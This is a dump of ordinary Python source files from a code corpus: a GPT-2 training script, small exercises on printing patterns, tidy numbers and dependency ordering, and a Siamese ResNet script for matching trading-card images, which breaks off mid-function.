# [CLS] marks the end of an article\n            full_line.append(full_tokenizer.convert_tokens_to_ids('[CLS]'))\n\n        with open(tokenized_data_path + 'tokenized_train_{}.txt'.format(i), 'w') as f:\n            for id in full_line:\n                f.write(str(id) + ' ')\n    
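# Each piece file is a flat list of space-separated token ids in which every article is\n    # wrapped as [MASK] ... [CLS]; main() below later cuts these files into n_ctx-sized\n    # windows advanced by --stride to form training samples.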
print('Tokenized Data Sample')\n    print('\\n'.join([' '.join(s) for s in show[:5]]))\n    print('Building from Raw Data Done')\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--device', default='0,1,2,3', type=str, required=False, help='Which GPUs to use, comma separated')\n    parser.add_argument(\n        '--model_config', type=str, required=True, help='Path to the model config file')\n    parser.add_argument('--tokenizer_path', type=str, required=True, help='Path to the vocabulary file')\n    parser.add_argument('--raw_data_path', type=str, required=True, help='Path to the training corpus')\n    parser.add_argument(\n        '--tokenized_data_path', default='data/tokenized/', type=str, required=False, help='Where to store the tokenized corpus')\n    parser.add_argument('--raw', action='store_true', help='Start from raw text, i.e. the corpus has not been tokenized yet')\n    parser.add_argument('--epochs', default=5, type=int, required=False, help='Number of epochs')\n    parser.add_argument('--batch_size', default=8, type=int, required=False, help='Batch size')\n    parser.add_argument('--lr', default=1.5e-4, type=float, required=False, help='Learning rate')\n    parser.add_argument('--warmup_steps', default=2000, type=int, required=False, help='Warmup steps for the optimizer')\n    parser.add_argument('--log_step', default=1, type=int, required=False, help='Interval between loss reports; must be a multiple of gradient accumulation')\n    parser.add_argument('--stride', default=768, type=int, required=False, help='Window stride over the training corpus')\n    parser.add_argument('--gradient_accumulation', default=1, type=int, required=False, help='Gradient accumulation steps')\n    parser.add_argument('--fp16', action='store_true', help='Use half-precision floats')\n    parser.add_argument('--fp16_opt_level', default='O1', type=str, required=False)\n    parser.add_argument('--max_grad_norm', default=1.0, type=float, required=False)\n    parser.add_argument('--num_pieces', default=100, type=int, required=False, help='Number of pieces to split the training corpus into')\n    parser.add_argument('--min_length', default=1, type=int, required=False, help='Minimum article length; shorter articles are discarded')\n    parser.add_argument('--output_dir', type=str, required=True, help='Model output directory')\n    parser.add_argument('--pretrained_model', default='', type=str, required=False, help='Path to a pretrained model to start from')\n    parser.add_argument('--writer_dir', default='tensorboard_summary/', type=str, required=False, help='Tensorboard output directory')\n    parser.add_argument('--segment', action='store_true', help='Tokenize at word level')\n    parser.add_argument('--bpe_token', action='store_true', help='Use Byte Pair Encoding')\n    parser.add_argument('--encoder_json', default='tokenizations/encoder.json', type=str, help='encoder.json')\n    parser.add_argument('--vocab_bpe', default='tokenizations/vocab.bpe', type=str, help='vocab.bpe')\n    parser.add_argument('--timezone', default=8, type=int, help='Timezone used for logging, default GMT+8')\n    parser.add_argument('--epoch_save', default=1, type=int, help='Save weights every N epochs')\n\n    args = parser.parse_args()\n    print(f'Arguments: {args!r}')\n\n    if args.segment:\n        from tokenizations import tokenization_bert_word_level as tokenization_bert\n    else:\n        from tokenizations import tokenization_bert\n\n    # Select which GPUs to use\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n\n    model_config = transformers.modeling_gpt2.GPT2Config.from_json_file(args.model_config)\n    print('Config:\\n' + model_config.to_json_string())\n\n    n_ctx = model_config.n_ctx\n    if args.bpe_token:\n        full_tokenizer = get_encoder(args.encoder_json, args.vocab_bpe)\n    else:\n        full_tokenizer = tokenization_bert.BertTokenizer(vocab_file=args.tokenizer_path)\n    full_tokenizer.max_len = 999999\n    device = 'cuda' if torch.cuda.is_available() else 'cpu'\n    print(f'Using Device: {device.upper()}')\n\n    raw_data_path = args.raw_data_path\n    
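# Example invocation (illustrative only; every path below is a placeholder):\n    #   python train.py --model_config config/model_config.json --tokenizer_path cache/vocab.txt \\\n    #       --raw_data_path data/train.json --raw --epochs 5 --batch_size 8 --output_dir model/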
tokenized_data_path = args.tokenized_data_path\n    raw = args.raw\n    epochs = args.epochs\n    batch_size = args.batch_size\n    lr = args.lr\n    warmup_steps = args.warmup_steps\n    log_step = args.log_step\n    stride = args.stride\n    gradient_accumulation = args.gradient_accumulation\n    # Do not enable this on GPUs without half-precision support\n    fp16 = args.fp16\n    fp16_opt_level = args.fp16_opt_level\n    max_grad_norm = args.max_grad_norm\n    num_pieces = args.num_pieces\n    min_length = args.min_length\n    output_dir = args.output_dir\n    tz = args.timezone\n    get_time = lambda: datetime.utcnow() + timedelta(hours=tz)\n    tb_writer = SummaryWriter(log_dir=args.writer_dir)\n    assert log_step % gradient_accumulation == 0\n\n    os.makedirs(output_dir, exist_ok=True)\n\n    if raw:\n        print('Building from Raw Data')\n        build_files(\n            data_path=raw_data_path,\n            tokenized_data_path=tokenized_data_path,\n            num_pieces=num_pieces,\n            full_tokenizer=full_tokenizer,\n            min_length=min_length\n        )\n\n    if not args.pretrained_model:\n        model = transformers.modeling_gpt2.GPT2LMHeadModel(config=model_config)\n    else:\n        model = transformers.modeling_gpt2.GPT2LMHeadModel.from_pretrained(args.pretrained_model)\n    model.train()\n    model.to(device)\n\n    num_parameters = 0\n    parameters = model.parameters()\n    for parameter in parameters:\n        num_parameters += parameter.numel()\n    print('Number of Parameters: {}'.format(num_parameters))\n\n    multi_gpu = False\n    full_len = 0\n    print('Calculating Total Steps')\n    for i in tqdm(range(num_pieces)):\n        with open(tokenized_data_path + f'tokenized_train_{i}.txt', 'r') as f:\n            full_len += len([int(item) for item in f.read().strip().split()])\n    total_steps = int(full_len / stride * epochs / batch_size / gradient_accumulation)\n    print(f'Total Steps: {total_steps}')\n\n    optimizer = transformers.AdamW(model.parameters(), lr=lr, correct_bias=True)\n    scheduler = transformers.WarmupLinearSchedule(\n        optimizer, warmup_steps=warmup_steps, t_total=total_steps)\n\n    if fp16:\n        try:\n            from apex import amp\n        except ImportError:\n            raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n        model, optimizer = amp.initialize(model, optimizer, opt_level=fp16_opt_level)\n\n    if torch.cuda.device_count() > 1:\n        print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n        model = DataParallel(model, device_ids=[int(i) for i in args.device.split(',')])\n        multi_gpu = True\n\n    print('Training Begin')\n    overall_step = 0\n    running_loss = 0\n\n    for epoch in range(epochs):\n        now = get_time()\n        print(f'Epoch {epoch + 1} - Time: {now}')\n        x = np.linspace(0, num_pieces - 1, num_pieces, dtype=np.int32)\n        random.shuffle(x)\n        piece_num = 0\n        for i in x:\n            with open(tokenized_data_path + 'tokenized_train_{}.txt'.format(i), 'r') as f:\n                line = f.read().strip()\n            tokens = line.split()\n            tokens = [int(token) for token in tokens]\n            start_point = 0\n            samples = []\n            while start_point < len(tokens) - n_ctx:\n                samples.append(tokens[start_point: start_point + n_ctx])\n                start_point += stride\n            if start_point < len(tokens):\n                samples.append(tokens[len(tokens)-n_ctx:])\n            random.shuffle(samples)\n            # Drop the final step if it cannot fill a complete batch\n            _steps = len(samples) // batch_size\n            for step in range(_steps):\n                # prepare data\n                batch = samples[step * batch_size: (step + 1) * batch_size]\n                batch_inputs = []\n                for ids in batch:\n                    int_ids = [int(x) for x in ids]\n                    batch_inputs.append(int_ids)\n                batch_inputs = torch.tensor(batch_inputs).long().to(device)\n\n                # forward pass\n                outputs = model.forward(input_ids=batch_inputs, labels=batch_inputs)\n                loss, logits = outputs[:2]\n\n                # get loss\n                
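# under DataParallel the forward pass returns one loss per GPU, so reduce with .mean();\n                # dividing by gradient_accumulation keeps the accumulated gradient equal to the\n                # average over the effective batch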
if multi_gpu:\n loss = loss.mean()\n if gradient_accumulation > 1:\n loss = loss / gradient_accumulation\n\n # loss backward\n if fp16:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), max_grad_norm)\n else:\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n\n # optimizer step\n if (overall_step + 1) % gradient_accumulation == 0:\n running_loss += loss.item()\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (overall_step + 1) % log_step == 0:\n tb_writer.add_scalar('loss', loss.item() * gradient_accumulation, overall_step)\n ts = datetime.utcnow() + timedelta(hours=8)\n ts = ts.strftime('%H:%M:%S')\n display_loss = running_loss * gradient_accumulation / (log_step / gradient_accumulation)\n print(\n f'Time {ts} - '\n f'Epoch {epoch + 1:{slen(epochs)}d}/{epochs} - '\n f'Step {step + 1:{slen(_steps)}d}/{_steps} - '\n f'Piece {piece_num + 1:{slen(num_pieces)}d}/{num_pieces} - '\n f'Loss {display_loss:.4f}'\n )\n running_loss = 0\n overall_step += 1\n piece_num += 1\n\n if (epoch + 1) % args.epoch_save == 0:\n print(f'Saving Model of Epoch {epoch + 1}')\n model_output_dir = os.path.join(output_dir, f'model_epoch{epoch + 1}')\n os.makedirs(model_output_dir, exist_ok=True)\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(model_output_dir)\n\n then = get_time()\n print(f'Epoch {epoch + 1} Finished - Time: {then}')\n delta = (then - now).total_seconds()\n mm, ss = delta // 60, delta % 60\n hh, mm = mm // 60, mm % 60\n print(f'Time Cost of the Epoch {epoch + 1} - {hh:.0f}:{mm:.0f}:{ss:.2f}')\n\n print('Training Done')\n model_output_dir = os.path.join(output_dir, 'final_model')\n os.makedirs(model_output_dir, exist_ok=True)\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(model_output_dir)\n\ndef slen(n):\n return len(str(n))\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614520656","text":"# print square pattern with digits in descending order \n# 3 2 1\n# 3 2 1\n# 3 2 1\nn = int(input(\"Enter no of rows \")) # 3 \nfor i in range(n):\n for j in range(n):\n print(n-j,end=\" \")\n print()\n ","sub_path":"square/ten.py","file_name":"ten.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590807357","text":"from sys import argv\n\n\ndef is_tidy(n):\n if n < 10:\n return True\n elif n % 10 == 0:\n return False\n\n digits = [int(d) for d in str(n)]\n\n k = 0\n\n for l in range(1, len(digits)):\n if digits[k] > digits[l]:\n return False\n k = l\n\n return True\n\n\ndef get_next_number(n):\n digits = [int(d) for d in str(n)]\n factor = 10 ** (len(digits)-1)\n\n if digits[0] == 9:\n return (9 * factor) - 1\n\n if digits[-1] == 0:\n # 11110\n if len(set(digits)) == 2 and digits[1] == 1:\n return factor - 1\n return n - 1\n else:\n for k, m in enumerate(digits):\n if m > digits[k+1]:\n # change k+1 to 0\n idx = k+1\n while idx < len(digits):\n digits[idx] = 0\n idx = idx + 1\n break\n n = int(''.join(map(str, digits)))\n\n return n\n\n\nif __name__ == '__main__':\n test_cases = open(argv[1])\n\n t = int(test_cases.readline())\n last_tidy = 1\n\n for i in range(1, t+1):\n n = 
int(test_cases.readline())\n current = n\n\n while True:\n if is_tidy(current):\n print(f\"Case #{i}: {current}\")\n break\n\n current = get_next_number(current)\n\n test_cases.close()\n","sub_path":"solutions_python/Problem_200/3349.py","file_name":"3349.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423042109","text":"def depend(dicto):\n a=[]\n b=len(dicto)\n print(b)\n while len(a)!=b:\n fl=0\n for x in dicto.copy():\n if len(dicto.get(x))==0:\n a.append(x)\n del dicto[x]\n else:\n for y in dicto.get(x):\n if y in a:\n fl=fl+1\n if fl==len(dicto.get(x)):\n a.append(x)\n del dicto[x]\n print(a)\n \npack=int(input(\"enter the no of packages to be installed\"))\nd={}\nfor i in range(pack):\n pa=input(\"enter the package name\")\n de=int(input(\"enter the no of dependecy\"))\n x=[]\n for j in range(de):\n dee=input(\"enter the name of the dependency\")\n x.append(dee)\n d[pa]=x \n \ndepend(d) \n","sub_path":"depend.py","file_name":"depend.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"339419790","text":"# -*- coding: utf-8 -*-\n\nimport torchvision\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader,Dataset\nimport matplotlib.pyplot as plt\nimport torchvision.utils\nimport numpy as np\nimport random\nfrom PIL import Image\nimport torch\nfrom torch.autograd import Variable\nimport PIL.ImageOps \nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport cv2\nfrom matplotlib import pyplot as plt\nimport os\n#from torchsummary import summary\nimport models_lpf.resnet as mod_res\n\n\nfrom time import time\nimport random\nimport torchvision.models as models\nimport pickle\n\n\nuseGPU = True\n\ntargetDirName = '../cardDatabaseFull/'\nassert os.path.exists(targetDirName)\n\n#loadPath = 'resShiftEasy-resnet101-e300-b24.pth'\n#dictPath = 'featureMap-resShiftEasy-res101-e300-b24.pkl'\n\n#loadPath = './res-dropout-early.pth'\n#dictPath = 'featureMap-combined.pkl'\n\n#loadPath = 'finalModel/resShiftEasy-resnet101-e300-b24.pth'\n#dictPath = 'finalModel/featureMap-resShiftEasy-res101-e300-b24-eval.pkl'\n\nloadPath = 'savedModels/res-withShift-150-072020.pth'\ndictPath = 'savedModels/featureMap-withShift-150-072020.pkl'\n\n\n#dictPath = 'featureMap-res-resShiftI-e300-b24.pkl'\n#dictPath = 'featureMap-5.pkl'\n#dictPath = 'featureMap-resL-resnet101-e245-b24-lte.pkl'\n\nassert os.path.exists(dictPath)\nassert os.path.exists(loadPath)\n\n\nviewNCards = 3\nsiftNLim = 10\nHOGRankingEnable = True\nextremeSIFT = False\n\ndim=(255,255)\n\n\nvisualizeResult = True\n'''\n# Problem cards\ntdm_0.png\ntdms_2.png\n\ntw_0.png\n\n/dark-magician/1.jpg\nshifted-dm_0.png\n\nbewd_dd.png\n'''\n\n'''\n# Card Crush Virus\ngroundTruthPath = targetDirName + 'Crush-Card-Virus-1-57728570/57728570.jpg'\nimagePath0 = './test-input/ccv_0.png'\n'''\n\n\n# Toon Dark Magician (tdm_0.png fails) (original rank of 1032) (HOG rank of 118)\ngroundTruthPath = targetDirName + 'Toon-Dark-Magician-0-21296502/21296502.jpg'\nimagePath0 = './test-input/tdm_0.png'\n#imagePath0 = './test-input/tdms_2.png'\n\n\n'''\n# Time Wizard \ngroundTruthPath = targetDirName + 'Time-Wizard-0-716252220/716252220.jpg'\nimagePath0 = './test-input/tw_0.png'\n'''\n\n'''\n# Dark Magician (still problems with sifted-dm_0.png)\n#imagePath0 = 
'./test-input/dm_0.png'\ngroundTruthPath = targetDirName + 'Dark-Magician-0-46986414/469864140.jpg'\nimagePath0 = './data/cards/training/dark-magician/1.jpg'\n#imagePath0 = './test-input/sifted-dm_0.png'\n'''\n'''\n#imagePath0 = './test-input/bewd_0.png'\ngroundTruthPath = targetDirName + 'BlueEyes-White-Dragon-1-89631139/896311391.jpg'\nimagePath0 = './test-input/bewd_dd.png'\n'''\nassert os.path.exists(imagePath0)\n\n\ncardName = imagePath0.split('/')[2]\n\n\n\n\n\n\n\n\"\"\"## Helper functions\nSet of helper functions\n\"\"\"\n\ndef imshow(img,text=None,should_save=False):\n npimg = img.numpy()\n plt.axis(\"off\")\n if text:\n plt.text(75, 8, text, style='italic',fontweight='bold',\n bbox={'facecolor':'white', 'alpha':0.8, 'pad':10})\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show() \n\ndef show_plot(iteration,loss):\n plt.plot(iteration,loss)\n plt.show()\n\n\"\"\"## Configuration Class\nA simple class to manage configuration\n\"\"\"\n\nclass Config():\n #training_dir = \"./data/cards_old/training/\"\n #testing_dir = \"./data/cards_old/testing/\"\n \n #training_dir = \"./data/cards/training/\"\n #testing_dir = \"./data/cards/testing/\"\n \n training_dir = \"../cardDatabase/\"\n testing_dir = \"../cardDatabase/\"\n \n \n #training_dir = \"./cardDatabaseFull/\"\n #testing_dir = \"./cardDatabaseFull/\"\n \n #testing_dir = \"./data/cards_old/testing/\"\n \n #train_batch_size = 24\n train_batch_size = 24*2\n\n #train_batch_size = 8\n train_number_epochs = 300\n\n\"\"\"## Custom Dataset Class\nThis dataset generates a pair of images. 0 for geniune pair and 1 for imposter pair\n\"\"\"\n\nclass SiameseNetworkDataset(Dataset):\n \n def __init__(self,imageFolderDataset,transform=None,should_invert=True):\n self.imageFolderDataset = imageFolderDataset \n self.transform = transform\n self.should_invert = should_invert\n\n def __getitem__(self,index):\n\n # Get an image\n img0_tuple = random.choice(self.imageFolderDataset.imgs)\n\n # Get an image from the same class\n while True:\n #keep looping till the same class image is found\n img1_tuple = random.choice(self.imageFolderDataset.imgs) \n if img0_tuple[1]==img1_tuple[1]:\n break\n\n # Get an image from a different class\n while True:\n #keep looping till a different class image is found\n \n img2_tuple = random.choice(self.imageFolderDataset.imgs) \n if img0_tuple[1] !=img2_tuple[1]:\n break\n\n #width,height = (100,150)\n width,height = (244,244)\n\n pathList = []\n pathList.append((img0_tuple[0],img1_tuple[0],img2_tuple[0]))\n\n img0 = Image.open(img0_tuple[0]).resize((width,height))\n img1 = Image.open(img1_tuple[0]).resize((width,height))\n img2 = Image.open(img2_tuple[0]).resize((width,height))\n \n \n # Crop the card art\n #img0 = img0[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n #img1 = img1[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n img0 = img0.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n img1 = img1.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n img2 = img2.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n \n \n img0 = img0.convert(\"L\")\n img1 = img1.convert(\"L\")\n img2 = img2.convert(\"L\")\n \n if self.should_invert:\n img0 = PIL.ImageOps.invert(img0)\n img1 = PIL.ImageOps.invert(img1)\n img2 = PIL.ImageOps.invert(img2)\n\n if self.transform is not None:\n img0 = self.transform(img0)\n img1 = self.transform(img1)\n img2 = self.transform(img2)\n \n #return img0, img1 , 
torch.from_numpy(np.array([int(img1_tuple[1]!=img0_tuple[1])],dtype=np.float32))\n\n # anchor, positive image, negative image\n return img0, img1 , img2, pathList\n\n def __len__(self):\n return len(self.imageFolderDataset.imgs)\n\n\"\"\"## Using Image Folder Dataset\"\"\"\n\nfolder_dataset = dset.ImageFolder(root=Config.training_dir)\n\n# Commented out IPython magic to ensure Python compatibility.\nclass ImgAugTransform:\n def __init__(self):\n self.aug = iaa.Sequential([\n #iaa.Scale((224, 224)),\n iaa.Sometimes(0.25, iaa.GaussianBlur(sigma=(0, 3.0))),\n #iaa.Affine(rotate=(-20, 20), mode='symmetric'),\n iaa.Sometimes(0.25,\n iaa.OneOf([iaa.Dropout(p=(0, 0.1)),\n iaa.CoarseDropout(0.1, size_percent=0.5)])),\n iaa.AddToHueAndSaturation(value=(-10, 10), per_channel=True)\n ])\n\n def __call__(self, img):\n img = np.array(img)\n return self.aug.augment_image(img)\n\n# https://colab.research.google.com/drive/109vu3F1LTzD1gdVV6cho9fKGx7lzbFll#scrollTo=aUpukiy8sBKx\nsiamese_dataset = SiameseNetworkDataset(imageFolderDataset=folder_dataset,\n transform=transforms.Compose([\n transforms.Grayscale(num_output_channels=3),\n #transforms.Resize((100,100)),\n transforms.Resize((244,244)),\n transforms.ColorJitter(brightness=(0.2,1.5),contrast=(0.1,2.5),hue=.05, saturation=(.0,.15)),\n #transforms.RandomHorizontalFlip(),\n #transforms.RandomRotation(10),\n \n transforms.RandomAffine(0, translate=(0.0,0.0), scale=None, shear=(0.0,0.0), resample=PIL.Image.NEAREST, fillcolor=(0,0,0)),\n transforms.ToTensor()\n #transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])\n ]),should_invert=False)\n\n\n\nvis_dataloader = DataLoader(siamese_dataset,\n shuffle=True,\n num_workers=8,\n #num_workers=0,\n batch_size=8)\ndataiter = iter(vis_dataloader)\n\n\n \nclass SiameseNetwork(nn.Module):\n def __init__(self):\n super(SiameseNetwork, self).__init__()\n\n\n #self.resnet = models.resnet101(pretrained=True)\n #self.resnet = models_lpf.resnet.resnet101(filter_size=3, pretrained=True)\n #self.resnet = mod_res.resnet101(filter_size=1, pretrained=True)\n self.resnet = mod_res.resnet101(filter_size=3)\n\n '''\n if useGPU:\n self.resnet.load_state_dict(torch.load('./pretrainedWeights/resnet101_lpf3.pth.tar')['state_dict'])\n else:\n device = torch.device('cpu')\n self.resnet.load_state_dict(torch.load('./pretrainedWeights/resnet101_lpf3.pth.tar', map_location=device)['state_dict'])\n '''\n #self.resnet = torch.nn.Sequential(*(list(self.resnet.children())[:-1]))\n\n def forward_once(self, x):\n '''\n output = self.cnn1(x)\n output = output.view(output.size()[0], -1)\n output = self.fc1(output)\n #print(output.shape)\n #print(output)\n '''\n #begin = time()\n output = self.resnet(x)\n #print('Time for forward prop: ', time()-begin)\n\n return output\n \n\n def forward(self, input1, input2, input3):\n output1 = self.forward_once(input1)\n output2 = self.forward_once(input2)\n output3 = self.forward_once(input3)\n\n return output1, output2, output3\n\n\"\"\"## Contrastive Loss / Triplet Loss\"\"\"\n\n\n\nclass ContrastiveLoss(torch.nn.Module):\n \"\"\"\n Contrastive loss function.\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n \"\"\"\n\n def __init__(self, margin=2.0):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n\n def forward(self, output1, output2, label):\n #begin = time()\n euclidean_distance = F.pairwise_distance(output1, output2, keepdim = True)\n loss_contrastive = torch.mean((1-label) * torch.pow(euclidean_distance, 2) +\n (label) * 
torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0), 2))\n\n #print('Time for contrastive Loss: ', time()-begin)\n return loss_contrastive\n\n\nclass TripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin):\n super(TripletLoss, self).__init__()\n self.margin = margin\n\n def forward(self, anchor, positive, negative, size_average=True):\n #begin = time()\n distance_positive = (anchor - positive).pow(2).sum(1) # .pow(.5)\n distance_negative = (anchor - negative).pow(2).sum(1) # .pow(.5)\n losses = F.relu(distance_positive - distance_negative + self.margin)\n\n #print('Time for triplet loss: ', time()-begin)\n\n return losses.mean() if size_average else losses.sum()\n\n\"\"\"## Training Time!\"\"\"\nprint('Loading train dataloader. . .')\ntrain_dataloader = DataLoader(siamese_dataset,\n shuffle=True,\n num_workers=0,\n batch_size=Config.train_batch_size)\n\n\n\n\n#net = SiameseNetwork_old().cuda()\n#net = SiameseNetwork_old()\n#net = SiameseNetwork().cuda()\n\nif useGPU:\n net = SiameseNetwork().cuda()\n margin = 2.\n criterion = TripletLoss(margin)\n\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n #net = nn.DataParallel(net,device_ids=[0,1,2,3])\n net = nn.DataParallel(net,device_ids=[0])\n net.load_state_dict(torch.load(loadPath))\nelse:\n device = torch.device('cpu')\n net = SiameseNetwork().to(device)\n margin = 2.\n criterion = TripletLoss(margin)\n\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n #net = nn.DataParallel(net, device_ids=None).to(device)\n \n \n state_dict = torch.load(loadPath,map_location=device)\n \n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k,v in state_dict.items():\n #name = k\n name = k[7:] # remove `module.`\n #name = 'module.'+k\n #print(name)\n new_state_dict[name] = v\n # load params\n\n net.load_state_dict(new_state_dict)\n net = net.to(device)\n\n#net.eval()\n\nprint('Model parallelized')\n\n\nprint('\\n\\n\\n\\n\\n Loaded model')\n\n\n\n#net = SiameseNetwork(Bottleneck, [3,4,23,3])\n#criterion = ContrastiveLoss()\n\n\n\n\n\n\ndef expand_img_dim(img,numOfExp):\n for i in range(0,numOfExp):\n img = np.expand_dims(img,axis=0)\n return img\n\ndef imgArtCropper(img):\n \n if type(img) is np.ndarray:\n width,height = img.shape\n img = img[int(0.2*height):int(0.7*height),int(0.2*width):int(0.8*width)]\n else:\n width, height = img.size\n img = img.crop((int(0.2*width), int(0.2*height), int(0.8*width), int(0.7*height))) \n \n return img\n\ndef imgPathToCVImg(absPath):\n img = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return img\n\ndef imgPathToTranslateCVImg(absPath,translation_matrix):\n img = cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA)\n img = cv2.warpAffine(img, translation_matrix, (img1.shape[0],img1.shape[1]))\n img = imgArtCropper(img)/255.0\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return img\n\ndef imgPathToNormalizedTranslateCVImg(absPath,translation_matrix):\n img = cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA)\n img = cv2.warpAffine(img, translation_matrix, (img.shape[0],img.shape[1]))\n img = imgArtCropper(img)\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n img = cv2.equalizeHist(img)\n return img\n\n\ndef imgPathToNormalizedCVImg(absPath):\n img0 = 
imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n\n img0 = cv2.equalizeHist(img0)\n return img0\n\ndef cvImgToTensor(img):\n if img.ndim < 3:\n img = [img] * 3\n img = expand_img_dim(img,1)\n elif img.ndim != 3:\n print(\"The dimensions of the image is neither 1 nor 3, this should not happen (cvImgToTensor)\")\n return None\n img = torch.from_numpy(img).type('torch.FloatTensor')\n return img\n\ndef imgPathToTensor(absPath):\n img1 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n img1 = [img1] * 3\n img1 = expand_img_dim(img1,1)\n img1 = torch.from_numpy(img1).type('torch.FloatTensor')\n\n return img1\n\ndef imgPathToNormalizedTensor(absPath):\n img0 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n\n img0 = cv2.equalizeHist(img0)\n\n img0 = [img0] * 3\n img0 = expand_img_dim(img0,1)\n img0 = torch.from_numpy(img0).type('torch.FloatTensor')\n return img0\n\n\n\n\ndef getSimilarRank(imagePath0,imagePath1):\n # Load image 0\n img0 = imgArtCropper(cv2.resize(cv2.imread(imagePath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\n img0 = [img0] * 3\n img0 = expand_img_dim(img0,1)\n img0 = torch.from_numpy(img0).type('torch.FloatTensor')\n\n # Load image 1\n img1 = imgArtCropper(cv2.resize(cv2.imread(imagePath1,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n img1 = [img1] * 3\n img1 = expand_img_dim(img1,1)\n img1 = torch.from_numpy(img1).type('torch.FloatTensor')\n\n # Compare and get similary rank\n concatenated = torch.cat((img0,img1),0)\n if useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img1).cuda(),Variable(img1).cuda())\n else:\n output1,output2,_ = net(Variable(img0),Variable(img1),Variable(img1))\n #begin = time()\n euclidean_distance = F.pairwise_distance(output1, output2)\n #print('Time to compare euclidean distance: ', time()-begin,'s')\n return euclidean_distance, (output1,output2)\n\ndef compareNCards(imgPath0,imgPath1,targetDirName,n_compare=10):\n # Declarations\n rankList = []\n featureMapList = []\n\n # N-way one shot learning evaluation\n # Compare positive images\n euclidean_distance,featureMap = getSimilarRank(imagePath0,imagePath1)\n output1 = featureMap[0]\n\n rankList.append((imagePath1.split('/')[-2],euclidean_distance.item(),imagePath1))\n featureMapList.append(output1)\n\n\n # Retrieve N negative images\n cardList = os.listdir(targetDirName)\n random.shuffle(cardList)\n cardList = cardList[:n_compare]\n negList = []\n for folderCard in cardList:\n cardDir = targetDirName + folderCard + '/'\n imgTar = os.listdir(cardDir)[0]\n imgPath = cardDir + imgTar\n negList.append(imgPath)\n\n #print(negList)\n\n\n # Compare ranks\n # Similar\n '''\n concatenated = torch.cat((img0,img1),0)\n #output1,output2,_ = net(Variable(img0),Variable(img1),Variable(img1))\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img1).cuda(),Variable(img1).cuda())\n euclidean_distance = F.pairwise_distance(output1, output2)\n '''\n\n # Different\n for filePath in negList:\n trueFilePath = filePath \n euclidean_distance,featureMap = getSimilarRank(imagePath0,trueFilePath)\n output1 = featureMap[0]\n\n 
